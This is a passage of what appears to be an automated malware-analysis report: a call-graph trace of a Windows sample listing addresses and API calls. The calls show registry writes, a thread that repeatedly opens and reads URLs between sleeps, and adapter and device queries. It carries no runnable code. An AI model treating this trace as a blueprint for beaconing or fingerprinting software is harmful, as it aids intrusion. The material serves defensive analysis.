19648->19637 19648->19645 19649 2c38639 RtlDecodePointer RtlEncodePointer 19648->19649 19652 2c3864b RtlDecodePointer RtlDecodePointer 19649->19652 19650->19632 19652->19648 19654 2c386d4 19653->19654 19655 2c386ae 19653->19655 19659 2c38a67 RtlLeaveCriticalSection 19654->19659 19655->19642 19657 2c38a67 RtlLeaveCriticalSection 19655->19657 19657->19644 19658->19650 19659->19655 19661 2c39176 19660->19661 19662 2c3918b RtlSizeHeap 19660->19662 19663 2c35e6b __mtinitlocknum 59 API calls 19661->19663 19662->19353 19664 2c3917b 19663->19664 19665 2c34f05 __filbuf 9 API calls 19664->19665 19666 2c39186 19665->19666 19666->19353 19669 2c38b12 19667->19669 19670 2c38b4f 19669->19670 19672 2c403b4 19669->19672 19693 2c39515 Sleep 19669->19693 19670->19352 19673 2c403bd 19672->19673 19674 2c403c8 19672->19674 19675 2c32fbc _malloc 59 API calls 19673->19675 19676 2c403d0 19674->19676 19684 2c403dd 19674->19684 19677 2c403c5 19675->19677 19678 2c32f84 _free 59 API calls 19676->19678 19677->19669 19692 2c403d8 __dosmaperr 19678->19692 19679 2c40415 19680 2c38213 __calloc_impl RtlDecodePointer 19679->19680 19682 2c4041b 19680->19682 19681 2c403e5 RtlReAllocateHeap 19681->19684 19681->19692 19685 2c35e6b __mtinitlocknum 59 API calls 19682->19685 19683 2c40445 19687 2c35e6b __mtinitlocknum 59 API calls 19683->19687 19684->19679 19684->19681 19684->19683 19686 2c38213 __calloc_impl RtlDecodePointer 19684->19686 19689 2c4042d 19684->19689 19685->19692 19686->19684 19688 2c4044a GetLastError 19687->19688 19688->19692 19690 2c35e6b __mtinitlocknum 59 API calls 19689->19690 19691 2c40432 GetLastError 19690->19691 19691->19692 19692->19669 19693->19669 19697 2c38a67 RtlLeaveCriticalSection 19694->19697 19696 2c332fb 19696->19343 19697->19696 19698 40d050 19699 40d3a5 19698->19699 19702 401f64 FindResourceA 19699->19702 19701 40d3aa 19703 401f86 GetLastError SizeofResource 19702->19703 19705 401f9f 19702->19705 19704 401fa6 LoadResource LockResource GlobalAlloc 19703->19704 19703->19705 19706 401fd2 19704->19706 19705->19701 19707 401ffb GetTickCount 19706->19707 19709 402005 GlobalAlloc 19707->19709 19709->19705 19710 40d2d3 19711 40d2d9 RegCloseKey 19710->19711 19712 40d2e0 19710->19712 19711->19712 19713 402154 19714 402157 19713->19714 19714->19714 19715 40d9ad RegSetValueExA 19714->19715 19716 4027d5 19717 4027cd RegQueryValueExA 19716->19717 19719 2c71a92 19720 2c74964 CreateThread 19719->19720 19722 2c8609a 19720->19722 19723 2c2648b RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 19720->19723 19724 2c264f3 GetTickCount 19723->19724 19801 2c242c7 19723->19801 19802 2c2605a 19724->19802 19727 2c26508 GetVersionExA 19728 2c26549 _memset 19727->19728 19729 2c32fbc _malloc 59 API calls 19728->19729 19730 2c26556 19729->19730 19731 2c32fbc _malloc 59 API calls 19730->19731 19732 2c26566 19731->19732 19733 2c32fbc _malloc 59 API calls 19732->19733 19734 2c26571 19733->19734 19735 2c32fbc _malloc 59 API calls 19734->19735 19736 2c2657c 19735->19736 19737 2c32fbc _malloc 59 API calls 19736->19737 19738 2c26587 19737->19738 19739 2c32fbc _malloc 59 API calls 19738->19739 19740 2c26592 19739->19740 19741 2c32fbc _malloc 59 API calls 19740->19741 19742 2c2659d 19741->19742 19743 2c32fbc _malloc 59 API calls 19742->19743 19744 2c265ac 6 API calls 19743->19744 19745 2c265ff _memset 19744->19745 19746 2c26618 RtlEnterCriticalSection RtlLeaveCriticalSection 19745->19746 19747 2c32fbc _malloc 59 API calls 19746->19747 19748 2c26657 19747->19748 19749 2c32fbc _malloc 59 API calls 19748->19749 19750 2c26665 19749->19750 19751 2c32fbc _malloc 59 API calls 19750->19751 19752 2c2666c 19751->19752 19753 2c32fbc _malloc 59 API calls 19752->19753 19754 2c26692 QueryPerformanceCounter Sleep 19753->19754 19755 2c32fbc _malloc 59 API calls 19754->19755 19756 2c266bf 19755->19756 19757 2c32fbc _malloc 59 API calls 19756->19757 19782 2c266cc _memset 19757->19782 19758 2c26708 Sleep 19759 2c2670e RtlEnterCriticalSection RtlLeaveCriticalSection 19758->19759 19759->19782 19760 2c272ab InternetOpenA 19761 2c272c9 InternetSetOptionA InternetSetOptionA InternetSetOptionA 19760->19761 19760->19782 19766 2c27342 _memset 19761->19766 19762 2c27322 InternetOpenUrlA 19763 2c27382 InternetCloseHandle 19762->19763 19762->19766 19763->19782 19764 2c27346 InternetReadFile 19765 2c27377 InternetCloseHandle 19764->19765 19764->19766 19765->19763 19766->19762 19766->19764 19767 2c273e9 RtlEnterCriticalSection RtlLeaveCriticalSection 19768 2c3234c 66 API calls 19767->19768 19768->19782 19769 2c3234c 66 API calls 19769->19782 19770 2c32fbc _malloc 59 API calls 19771 2c2749d RtlEnterCriticalSection RtlLeaveCriticalSection 19770->19771 19771->19782 19772 2c2776a RtlEnterCriticalSection RtlLeaveCriticalSection 19772->19782 19773 2c261f5 59 API calls 19773->19782 19774 2c32428 _sprintf 84 API calls 19774->19782 19775 2c21ba7 RtlEnterCriticalSection RtlLeaveCriticalSection RtlEnterCriticalSection RtlLeaveCriticalSection 19775->19782 19776 2c278e2 RtlEnterCriticalSection 19777 2c2790f RtlLeaveCriticalSection 19776->19777 19776->19782 19780 2c23c67 72 API calls 19777->19780 19778 2c2534d 93 API calls 19778->19782 19779 2c32fbc 59 API calls _malloc 19779->19782 19780->19782 19781 2c23d7e 64 API calls 19781->19782 19782->19758 19782->19759 19782->19760 19782->19767 19782->19769 19782->19770 19782->19772 19782->19773 19782->19774 19782->19775 19782->19776 19782->19777 19782->19778 19782->19779 19782->19781 19783 2c2833f 89 API calls 19782->19783 19784 2c2a729 73 API calls 19782->19784 19785 2c29007 88 API calls 19782->19785 19786 2c32f84 59 API calls _free 19782->19786 19787 2c335f6 60 API calls _strtok 19782->19787 19788 2c283ee 71 API calls 19782->19788 19789 2c33b5c _Allocate 60 API calls 19782->19789 19790 2c32860 _swscanf 59 API calls 19782->19790 19791 2c233b2 86 API calls 19782->19791 19792 2c2973b 6 API calls 19782->19792 19793 2c2a853 60 API calls 19782->19793 19794 2c25119 103 API calls 19782->19794 19795 2c2d11b 73 API calls 19782->19795 19796 2c2ac13 88 API calls 19782->19796 19797 2c276ec Sleep 19782->19797 19799 2c276e7 shared_ptr 19782->19799 19783->19782 19784->19782 19785->19782 19786->19782 19787->19782 19788->19782 19789->19782 19790->19782 19791->19782 19792->19782 19793->19782 19794->19782 19795->19782 19796->19782 19798 2c31900 GetProcessHeap HeapFree 19797->19798 19798->19799 19799->19782 19799->19797 19800 2c24100 GetProcessHeap HeapFree 19799->19800 19800->19799 19803 2c32fbc _malloc 59 API calls 19802->19803 19804 2c2606d 19803->19804 19805 402797 19806 40d1c5 GetCommandLineW 19805->19806 19807 40d84e CommandLineToArgvW GetLocalTime 19806->19807 19810 401f27 19807->19810 19811 401f3c 19810->19811 19814 401a1d 19811->19814 19813 401f45 19815 401a2c 19814->19815 19820 401a4f CreateFileA 19815->19820 19819 401a3e 19819->19813 19821 401a35 19820->19821 19825 401a7d 19820->19825 19828 401b4b LoadLibraryA 19821->19828 19822 401a98 DeviceIoControl 19822->19825 19823 401b3a CloseHandle 19823->19821 19825->19822 19825->19823 19826 401b0e GetLastError 19825->19826 19837 402ca6 19825->19837 19840 402c98 19825->19840 19826->19823 19826->19825 19829 401c21 19828->19829 19830 401b6e GetProcAddress 19828->19830 19829->19819 19831 401c18 FreeLibrary 19830->19831 19835 401b85 19830->19835 19831->19829 19832 401b95 GetAdaptersInfo 19832->19835 19833 402ca6 7 API calls 19833->19835 19834 401c15 19834->19831 19835->19832 19835->19833 19835->19834 19836 402c98 12 API calls 19835->19836 19836->19835 19843 4030a1 19837->19843 19873 403001 19840->19873 19844 402caf 19843->19844 19845 4030ad 19843->19845 19844->19825 19846 4030b7 19845->19846 19847 4030cd 19845->19847 19849 4030f9 HeapFree 19846->19849 19850 4030c3 19846->19850 19848 4030f8 19847->19848 19851 4030e7 19847->19851 19848->19849 19849->19844 19854 40443e 19850->19854 19860 404ecf 19851->19860 19855 40447c 19854->19855 19859 404732 19854->19859 19856 404678 VirtualFree 19855->19856 19855->19859 19857 4046dc 19856->19857 19858 4046eb VirtualFree HeapFree 19857->19858 19857->19859 19858->19859 19859->19844 19861 404f12 19860->19861 19862 404efc 19860->19862 19861->19844 19862->19861 19864 404db6 19862->19864 19867 404dc3 19864->19867 19865 404e73 19865->19861 19866 404de4 VirtualFree 19866->19867 19867->19865 19867->19866 19869 404d60 VirtualFree 19867->19869 19870 404d7d 19869->19870 19871 404dad 19870->19871 19872 404d8d HeapFree 19870->19872 19871->19867 19872->19867 19874 402ca3 19873->19874 19876 403008 19873->19876 19874->19825 19876->19874 19877 40302d 19876->19877 19878 40303c 19877->19878 19881 403051 19877->19881 19885 40304a 19878->19885 19886 404767 19878->19886 19880 403090 HeapAlloc 19882 40309f 19880->19882 19881->19880 19881->19885 19892 404f14 19881->19892 19882->19876 19883 40304f 19883->19876 19885->19880 19885->19882 19885->19883 19889 404799 19886->19889 19887 404838 19891 404847 19887->19891 19906 404b21 19887->19906 19889->19887 19889->19891 19899 404a70 19889->19899 19891->19885 19897 404f22 19892->19897 19893 40500e VirtualAlloc 19898 404fdf 19893->19898 19894 4050e3 19910 404c1c 19894->19910 19897->19893 19897->19894 19897->19898 19898->19885 19900 404ab3 HeapAlloc 19899->19900 19901 404a83 HeapReAlloc 19899->19901 19903 404b03 19900->19903 19904 404ad9 VirtualAlloc 19900->19904 19902 404aa2 19901->19902 19901->19903 19902->19900 19903->19887 19904->19903 19905 404af3 HeapFree 19904->19905 19905->19903 19907 404b33 VirtualAlloc 19906->19907 19909 404b7c 19907->19909 19909->19891 19911 404c30 HeapAlloc 19910->19911 19912 404c29 19910->19912 19913 404c4d VirtualAlloc 19911->19913 19914 404c85 19911->19914 19912->19913 19915 404d42 19913->19915 19916 404c6d VirtualAlloc 19913->19916 19914->19898 19915->19914 19917 404d4a HeapFree 19915->19917 19916->19914 19918 404d34 VirtualFree 19916->19918 19917->19914 19918->19915 19919 40269a 19920 402622 19919->19920 19921 40269e 19919->19921 19924 40212f 19921->19924 19925 40d1d1 VirtualAlloc 19924->19925 19929 2c33d1f 19930 2c33d28 19929->19930 19931 2c33d2d 19929->19931 19943 2c3b8f1 19930->19943 19935 2c33d42 19931->19935 19934 2c33d3b 19936 2c33d4e __mtinitlocknum 19935->19936 19940 2c33d9c ___DllMainCRTStartup 19936->19940 19942 2c33df9 __mtinitlocknum 19936->19942 19947 2c33bad 19936->19947 19938 2c33dd6 19939 2c33bad __CRT_INIT@12 138 API calls 19938->19939 19938->19942 19939->19942 19940->19938 19941 2c33bad __CRT_INIT@12 138 API calls 19940->19941 19940->19942 19941->19938 19942->19934 19944 2c3b921 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 19943->19944 19945 2c3b914 19943->19945 19946 2c3b918 19944->19946 19945->19944 19945->19946 19946->19931 19948 2c33bb9 __mtinitlocknum 19947->19948 19949 2c33bc1 19948->19949 19950 2c33c3b 19948->19950 19995 2c381f6 GetProcessHeap 19949->19995 19952 2c33ca4 19950->19952 19953 2c33c3f 19950->19953 19955 2c33d07 19952->19955 19956 2c33ca9 19952->19956 19958 2c33c60 19953->19958 19965 2c33bca __mtinitlocknum __CRT_INIT@12 19953->19965 20096 2c3846b 19953->20096 19954 2c33bc6 19954->19965 19996 2c35da4 19954->19996 19955->19965 20127 2c35c34 19955->20127 19957 2c391db __CRT_INIT@12 TlsGetValue 19956->19957 19960 2c33cb4 19957->19960 20099 2c38342 RtlDecodePointer 19958->20099 19960->19965 19966 2c38a7c __calloc_crt 59 API calls 19960->19966 19965->19940 19967 2c33cc5 19966->19967 19967->19965 19973 2c391fa __CRT_INIT@12 TlsSetValue 19967->19973 19968 2c3b58f __ioterm 60 API calls 19971 2c33c71 19968->19971 19969 2c33bd6 __RTC_Initialize 19969->19965 19972 2c33be6 GetCommandLineA 19969->19972 19974 2c35e1a __mtterm 62 API calls 19971->19974 20017 2c3b98d GetEnvironmentStringsW 19972->20017 19976 2c33cdd 19973->19976 19977 2c33c76 __CRT_INIT@12 19974->19977 19979 2c33ce3 19976->19979 19980 2c33cfb 19976->19980 20123 2c33c8f 19977->20123 19982 2c35cf1 __initptd 59 API calls 19979->19982 19983 2c32f84 _free 59 API calls 19980->19983 19985 2c33ceb GetCurrentThreadId 19982->19985 19983->19965 19984 2c33c00 19986 2c33c04 19984->19986 20049 2c3b5e1 19984->20049 19985->19965 20082 2c35e1a 19986->20082 19990 2c33c24 19990->19965 20091 2c3b58f 19990->20091 19995->19954 20135 2c38512 RtlEncodePointer 19996->20135 19998 2c35da9 20140 2c38a2e 19998->20140 20001 2c35db2 20002 2c35e1a __mtterm 62 API calls 20001->20002 20004 2c35db7 20002->20004 20004->19969 20006 2c35dcf 20007 2c38a7c __calloc_crt 59 API calls 20006->20007 20008 2c35ddc 20007->20008 20009 2c35e11 20008->20009 20011 2c391fa __CRT_INIT@12 TlsSetValue 20008->20011 20010 2c35e1a __mtterm 62 API calls 20009->20010 20012 2c35e16 20010->20012 20013 2c35df0 20011->20013 20012->19969 20013->20009 20014 2c35df6 20013->20014 20015 2c35cf1 __initptd 59 API calls 20014->20015 20016 2c35dfe GetCurrentThreadId 20015->20016 20016->19969 20018 2c3b9a0 WideCharToMultiByte 20017->20018 20019 2c33bf6 20017->20019 20021 2c3b9d3 20018->20021 20022 2c3ba0a FreeEnvironmentStringsW 20018->20022 20030 2c3b2db 20019->20030 20023 2c38ac4 __malloc_crt 59 API calls 20021->20023 20022->20019 20024 2c3b9d9 20023->20024 20024->20022 20025 2c3b9e0 WideCharToMultiByte 20024->20025 20026 2c3b9f6 20025->20026 20027 2c3b9ff FreeEnvironmentStringsW 20025->20027 20028 2c32f84 _free 59 API calls 20026->20028 20027->20019 20029 2c3b9fc 20028->20029 20029->20027 20031 2c3b2e7 __mtinitlocknum 20030->20031 20032 2c388fd __lock 59 API calls 20031->20032 20033 2c3b2ee 20032->20033 20034 2c38a7c __calloc_crt 59 API calls 20033->20034 20036 2c3b2ff 20034->20036 20035 2c3b36a GetStartupInfoW 20043 2c3b37f 20035->20043 20046 2c3b4ae 20035->20046 20036->20035 20037 2c3b30a __mtinitlocknum @_EH4_CallFilterFunc@8 20036->20037 20037->19984 20038 2c3b576 20148 2c3b586 20038->20148 20040 2c38a7c __calloc_crt 59 API calls 20040->20043 20041 2c3b4fb GetStdHandle 20041->20046 20042 2c3b50e GetFileType 20042->20046 20043->20040 20045 2c3b3cd 20043->20045 20043->20046 20044 2c3b401 GetFileType 20044->20045 20045->20044 20045->20046 20047 2c3921c __mtinitlocknum InitializeCriticalSectionAndSpinCount 20045->20047 20046->20038 20046->20041 20046->20042 20048 2c3921c __mtinitlocknum InitializeCriticalSectionAndSpinCount 20046->20048 20047->20045 20048->20046 20050 2c3b5f4 GetModuleFileNameA 20049->20050 20051 2c3b5ef 20049->20051 20053 2c3b621 20050->20053 20158 2c3529a 20051->20158 20152 2c3b694 20053->20152 20056 2c33c10 20056->19990 20060 2c3b810 20056->20060 20057 2c38ac4 __malloc_crt 59 API calls 20058 2c3b65a 20057->20058 20058->20056 20059 2c3b694 _parse_cmdline 59 API calls 20058->20059 20059->20056 20061 2c3b819 20060->20061 20065 2c3b81e _strlen 20060->20065 20062 2c3529a ___initmbctable 71 API calls 20061->20062 20062->20065 20063 2c33c19 20063->19990 20076 2c3847a 20063->20076 20064 2c38a7c __calloc_crt 59 API calls 20066 2c3b854 _strlen 20064->20066 20065->20063 20065->20064 20066->20063 20068 2c3b8a6 20066->20068 20069 2c38a7c __calloc_crt 59 API calls 20066->20069 20070 2c3b8cd 20066->20070 20073 2c3b8e4 20066->20073 20362 2c36ccc 20066->20362 20067 2c32f84 _free 59 API calls 20067->20063 20068->20067 20069->20066 20071 2c32f84 _free 59 API calls 20070->20071 20071->20063 20074 2c34f15 __invoke_watson 8 API calls 20073->20074 20075 2c3b8f0 20074->20075 20078 2c38486 __IsNonwritableInCurrentImage 20076->20078 20371 2c3d2ef 20078->20371 20079 2c384a4 __initterm_e 20080 2c333b4 __cinit 68 API calls 20079->20080 20081 2c384c3 __cinit __IsNonwritableInCurrentImage 20079->20081 20080->20081 20081->19990 20083 2c35e2a 20082->20083 20084 2c35e24 20082->20084 20086 2c38947 RtlDeleteCriticalSection 20083->20086 20087 2c38963 20083->20087 20374 2c391bc 20084->20374 20088 2c32f84 _free 59 API calls 20086->20088 20089 2c3896f RtlDeleteCriticalSection 20087->20089 20090 2c38982 20087->20090 20088->20083 20089->20087 20090->19965 20095 2c3b596 20091->20095 20092 2c3b5de 20092->19986 20093 2c32f84 _free 59 API calls 20093->20095 20094 2c3b5af RtlDeleteCriticalSection 20094->20095 20095->20092 20095->20093 20095->20094 20097 2c385b4 _doexit 59 API calls 20096->20097 20098 2c38476 20097->20098 20098->19958 20100 2c3836e 20099->20100 20101 2c3835c 20099->20101 20102 2c32f84 _free 59 API calls 20100->20102 20101->20100 20104 2c32f84 _free 59 API calls 20101->20104 20103 2c3837b 20102->20103 20105 2c3839f 20103->20105 20107 2c32f84 _free 59 API calls 20103->20107 20104->20101 20106 2c32f84 _free 59 API calls 20105->20106 20108 2c383ab 20106->20108 20107->20103 20109 2c32f84 _free 59 API calls 20108->20109 20110 2c383bc 20109->20110 20111 2c32f84 _free 59 API calls 20110->20111 20112 2c383c7 20111->20112 20113 2c383ec RtlEncodePointer 20112->20113 20116 2c32f84 _free 59 API calls 20112->20116 20114 2c38401 20113->20114 20115 2c38407 20113->20115 20117 2c32f84 _free 59 API calls 20114->20117 20118 2c3841d 20115->20118 20120 2c32f84 _free 59 API calls 20115->20120 20119 2c383eb 20116->20119 20117->20115 20121 2c33c65 20118->20121 20122 2c32f84 _free 59 API calls 20118->20122 20119->20113 20120->20118 20121->19968 20121->19977 20122->20121 20124 2c33ca1 20123->20124 20125 2c33c93 20123->20125 20124->19965 20125->20124 20126 2c35e1a __mtterm 62 API calls 20125->20126 20126->20124 20128 2c35c41 20127->20128 20134 2c35c67 20127->20134 20129 2c391db __CRT_INIT@12 TlsGetValue 20128->20129 20131 2c35c4f 20128->20131 20129->20131 20130 2c391fa __CRT_INIT@12 TlsSetValue 20132 2c35c5f 20130->20132 20131->20130 20377 2c35aff 20132->20377 20134->19965 20136 2c38523 __init_pointers __initp_misc_winsig 20135->20136 20147 2c33a17 RtlEncodePointer 20136->20147 20138 2c3853b __init_pointers 20139 2c3928a 34 API calls 20138->20139 20139->19998 20143 2c38a3a 20140->20143 20141 2c3921c __mtinitlocknum InitializeCriticalSectionAndSpinCount 20141->20143 20142 2c35dae 20142->20001 20144 2c3919e 20142->20144 20143->20141 20143->20142 20145 2c391b5 TlsAlloc 20144->20145 20146 2c35dc4 20144->20146 20146->20001 20146->20006 20147->20138 20151 2c38a67 RtlLeaveCriticalSection 20148->20151 20150 2c3b58d 20150->20037 20151->20150 20153 2c3b6b6 20152->20153 20157 2c3b71a 20153->20157 20162 2c415e6 20153->20162 20155 2c3b637 20155->20056 20155->20057 20156 2c415e6 _parse_cmdline 59 API calls 20156->20157 20157->20155 20157->20156 20159 2c352a3 20158->20159 20160 2c352aa 20158->20160 20250 2c355f7 20159->20250 20160->20050 20165 2c4158c 20162->20165 20168 2c3228b 20165->20168 20169 2c3229c 20168->20169 20175 2c322e9 20168->20175 20176 2c35c6a 20169->20176 20172 2c322c9 20172->20175 20196 2c35551 20172->20196 20175->20153 20177 2c35c82 __getptd_noexit 59 API calls 20176->20177 20178 2c35c70 20177->20178 20179 2c322a2 20178->20179 20180 2c3844f __amsg_exit 59 API calls 20178->20180 20179->20172 20181 2c351cf 20179->20181 20180->20179 20182 2c351db __mtinitlocknum 20181->20182 20183 2c35c6a __CreateFrameInfo 59 API calls 20182->20183 20184 2c351e4 20183->20184 20185 2c35213 20184->20185 20187 2c351f7 20184->20187 20186 2c388fd __lock 59 API calls 20185->20186 20188 2c3521a 20186->20188 20189 2c35c6a __CreateFrameInfo 59 API calls 20187->20189 20208 2c3524f 20188->20208 20191 2c351fc 20189->20191 20194 2c3844f __amsg_exit 59 API calls 20191->20194 20195 2c3520a __mtinitlocknum 20191->20195 20194->20195 20195->20172 20197 2c3555d __mtinitlocknum 20196->20197 20198 2c35c6a __CreateFrameInfo 59 API calls 20197->20198 20199 2c35567 20198->20199 20200 2c388fd __lock 59 API calls 20199->20200 20204 2c35579 20199->20204 20201 2c35597 20200->20201 20206 2c32f84 _free 59 API calls 20201->20206 20207 2c355c4 20201->20207 20202 2c3844f __amsg_exit 59 API calls 20205 2c35587 __mtinitlocknum 20202->20205 20204->20202 20204->20205 20205->20175 20206->20207 20246 2c355ee 20207->20246 20209 2c3522e 20208->20209 20210 2c3525a ___addlocaleref ___removelocaleref 20208->20210 20212 2c35246 20209->20212 20210->20209 20215 2c34fd5 20210->20215 20245 2c38a67 RtlLeaveCriticalSection 20212->20245 20214 2c3524d 20214->20191 20216 2c3504e 20215->20216 20218 2c34fea 20215->20218 20217 2c32f84 _free 59 API calls 20216->20217 20219 2c3509b 20216->20219 20221 2c3506f 20217->20221 20218->20216 20227 2c3501b 20218->20227 20229 2c32f84 _free 59 API calls 20218->20229 20220 2c350c4 20219->20220 20222 2c3d54d ___free_lc_time 59 API calls 20219->20222 20225 2c35123 20220->20225 20240 2c32f84 59 API calls _free 20220->20240 20223 2c32f84 _free 59 API calls 20221->20223 20224 2c350b9 20222->20224 20226 2c35082 20223->20226 20230 2c32f84 _free 59 API calls 20224->20230 20231 2c32f84 _free 59 API calls 20225->20231 20232 2c32f84 _free 59 API calls 20226->20232 20233 2c32f84 _free 59 API calls 20227->20233 20244 2c35039 20227->20244 20228 2c32f84 _free 59 API calls 20234 2c35043 20228->20234 20235 2c35010 20229->20235 20230->20220 20236 2c35129 20231->20236 20237 2c35090 20232->20237 20238 2c3502e 20233->20238 20239 2c32f84 _free 59 API calls 20234->20239 20241 2c3d3ea ___free_lconv_mon 59 API calls 20235->20241 20236->20209 20242 2c32f84 _free 59 API calls 20237->20242 20243 2c3d4e6 ___free_lconv_num 59 API calls 20238->20243 20239->20216 20240->20220 20241->20227 20242->20219 20243->20244 20244->20228 20245->20214 20249 2c38a67 RtlLeaveCriticalSection 20246->20249 20248 2c355f5 20248->20204 20249->20248 20251 2c35603 __mtinitlocknum 20250->20251 20252 2c35c6a __CreateFrameInfo 59 API calls 20251->20252 20253 2c3560b 20252->20253 20254 2c35551 __setmbcp 59 API calls 20253->20254 20255 2c35615 20254->20255 20275 2c352f2 20255->20275 20258 2c38ac4 __malloc_crt 59 API calls 20259 2c35637 20258->20259 20260 2c35764 __mtinitlocknum 20259->20260 20282 2c3579f 20259->20282 20260->20160 20263 2c35774 20263->20260 20265 2c32f84 _free 59 API calls 20263->20265 20268 2c35787 20263->20268 20264 2c3566d 20267 2c32f84 _free 59 API calls 20264->20267 20269 2c3568d 20264->20269 20265->20268 20266 2c35e6b __mtinitlocknum 59 API calls 20266->20260 20267->20269 20268->20266 20269->20260 20270 2c388fd __lock 59 API calls 20269->20270 20272 2c356bc 20270->20272 20271 2c3574a 20292 2c35769 20271->20292 20272->20271 20274 2c32f84 _free 59 API calls 20272->20274 20274->20271 20276 2c3228b _LocaleUpdate::_LocaleUpdate 59 API calls 20275->20276 20277 2c35302 20276->20277 20278 2c35323 20277->20278 20279 2c35311 GetOEMCP 20277->20279 20280 2c3533a 20278->20280 20281 2c35328 GetACP 20278->20281 20279->20280 20280->20258 20280->20260 20281->20280 20283 2c352f2 getSystemCP 61 API calls 20282->20283 20284 2c357bc 20283->20284 20287 2c3580d IsValidCodePage 20284->20287 20289 2c357c3 setSBCS 20284->20289 20291 2c35832 _memset __setmbcp_nolock 20284->20291 20285 2c3455b TranslatorGuardHandler 6 API calls 20286 2c3565e 20285->20286 20286->20263 20286->20264 20288 2c3581f GetCPInfo 20287->20288 20287->20289 20288->20289 20288->20291 20289->20285 20295 2c353bf GetCPInfo 20291->20295 20361 2c38a67 RtlLeaveCriticalSection 20292->20361 20294 2c35770 20294->20260 20296 2c354a1 20295->20296 20302 2c353f7 20295->20302 20299 2c3455b TranslatorGuardHandler 6 API calls 20296->20299 20301 2c3554d 20299->20301 20301->20289 20305 2c3dc2d 20302->20305 20304 2c3dad1 ___crtLCMapStringA 63 API calls 20304->20296 20306 2c3228b _LocaleUpdate::_LocaleUpdate 59 API calls 20305->20306 20307 2c3dc3e 20306->20307 20315 2c3db35 20307->20315 20310 2c3dad1 20311 2c3228b _LocaleUpdate::_LocaleUpdate 59 API calls 20310->20311 20312 2c3dae2 20311->20312 20332 2c3d8cd 20312->20332 20316 2c3db4f 20315->20316 20317 2c3db5c MultiByteToWideChar 20315->20317 20316->20317 20319 2c3db88 20317->20319 20327 2c3db81 20317->20327 20318 2c3455b TranslatorGuardHandler 6 API calls 20320 2c35458 20318->20320 20321 2c3dbaa _memset 20319->20321 20322 2c32fbc _malloc 59 API calls 20319->20322 20320->20310 20323 2c3dbe6 MultiByteToWideChar 20321->20323 20321->20327 20322->20321 20324 2c3dc10 20323->20324 20325 2c3dc00 GetStringTypeW 20323->20325 20328 2c3db17 20324->20328 20325->20324 20327->20318 20329 2c3db32 20328->20329 20330 2c3db21 20328->20330 20329->20327 20330->20329 20331 2c32f84 _free 59 API calls 20330->20331 20331->20329 20335 2c3d8e6 MultiByteToWideChar 20332->20335 20334 2c3d945 20336 2c3455b TranslatorGuardHandler 6 API calls 20334->20336 20335->20334 20338 2c3d94c 20335->20338 20339 2c35479 20336->20339 20337 2c3d9ab MultiByteToWideChar 20340 2c3da12 20337->20340 20341 2c3d9c4 20337->20341 20344 2c32fbc _malloc 59 API calls 20338->20344 20345 2c3d974 20338->20345 20339->20304 20343 2c3db17 __freea 59 API calls 20340->20343 20357 2c3f6f8 20341->20357 20343->20334 20344->20345 20345->20334 20345->20337 20346 2c3d9d8 20346->20340 20347 2c3d9ee 20346->20347 20348 2c3da1a 20346->20348 20347->20340 20349 2c3f6f8 __crtLCMapStringA_stat LCMapStringW 20347->20349 20352 2c32fbc _malloc 59 API calls 20348->20352 20355 2c3da42 20348->20355 20349->20340 20350 2c3f6f8 __crtLCMapStringA_stat LCMapStringW 20351 2c3da85 20350->20351 20353 2c3daad 20351->20353 20356 2c3da9f WideCharToMultiByte 20351->20356 20352->20355 20354 2c3db17 __freea 59 API calls 20353->20354 20354->20340 20355->20340 20355->20350 20356->20353 20358 2c3f723 __crtLCMapStringA_stat 20357->20358 20359 2c3f708 20357->20359 20360 2c3f73a LCMapStringW 20358->20360 20359->20346 20360->20346 20361->20294 20363 2c36ce5 20362->20363 20364 2c36cd7 20362->20364 20365 2c35e6b __mtinitlocknum 59 API calls 20363->20365 20364->20363 20366 2c36cfb 20364->20366 20370 2c36cec 20365->20370 20368 2c36cf6 20366->20368 20369 2c35e6b __mtinitlocknum 59 API calls 20366->20369 20367 2c34f05 __filbuf 9 API calls 20367->20368 20368->20066 20369->20370 20370->20367 20372 2c3d2f2 RtlEncodePointer 20371->20372 20372->20372 20373 2c3d30c 20372->20373 20373->20079 20375 2c391d3 TlsFree 20374->20375 20376 2c391cf 20374->20376 20375->20083 20376->20083 20378 2c35b0b __mtinitlocknum 20377->20378 20379 2c35c13 __mtinitlocknum 20378->20379 20380 2c32f84 _free 59 API calls 20378->20380 20382 2c35b24 20378->20382 20379->20134 20380->20382 20381 2c35b33 20383 2c35b42 20381->20383 20385 2c32f84 _free 59 API calls 20381->20385 20382->20381 20384 2c32f84 _free 59 API calls 20382->20384 20386 2c35b51 20383->20386 20387 2c32f84 _free 59 API calls 20383->20387 20384->20381 20385->20383 20388 2c35b60 20386->20388 20389 2c32f84 _free 59 API calls 20386->20389 20387->20386 20390 2c35b6f 20388->20390 20392 2c32f84 _free 59 API calls 20388->20392 20389->20388 20391 2c35b7e 20390->20391 20393 2c32f84 _free 59 API calls 20390->20393 20394 2c35b90 20391->20394 20395 2c32f84 _free 59 API calls 20391->20395 20392->20390 20393->20391 20396 2c388fd __lock 59 API calls 20394->20396 20395->20394 20400 2c35b98 20396->20400 20397 2c35bbb 20409 2c35c1f 20397->20409 20400->20397 20402 2c32f84 _free 59 API calls 20400->20402 20401 2c388fd __lock 59 API calls 20407 2c35bcf ___removelocaleref 20401->20407 20402->20397 20403 2c35c00 20412 2c35c2b 20403->20412 20406 2c32f84 _free 59 API calls 20406->20379 20407->20403 20408 2c34fd5 ___freetlocinfo 59 API calls 20407->20408 20408->20403 20415 2c38a67 RtlLeaveCriticalSection 20409->20415 20411 2c35bc8 20411->20401 20416 2c38a67 RtlLeaveCriticalSection 20412->20416 20414 2c35c0d 20414->20406 20415->20411 20416->20414 20417 4025dd 20418 40d9da Sleep 20417->20418 20419 40d11f LoadLibraryExA 20420 402174 20419->20420 20421 40dab2 20420->20421 20422 40d2b4 GetLastError 20420->20422 20422->20420 20423 2c2f8a7 CreateFileA 20424 2c2f9a3 20423->20424 20427 2c2f8d8 20423->20427 20425 2c2f8f0 DeviceIoControl 20425->20427 20426 2c2f999 CloseHandle 20426->20424 20427->20425 20427->20426 20427->20427 20428 2c2f965 GetLastError 20427->20428 20430 2c33b5c 20427->20430 20428->20426 20428->20427 20432 2c33b64 20430->20432 20431 2c32fbc _malloc 59 API calls 20431->20432 20432->20431 20433 2c33b7e 20432->20433 20434 2c38213 __calloc_impl RtlDecodePointer 20432->20434 20435 2c33b82 std::exception::exception 20432->20435 20433->20427 20434->20432 20438 2c3456a 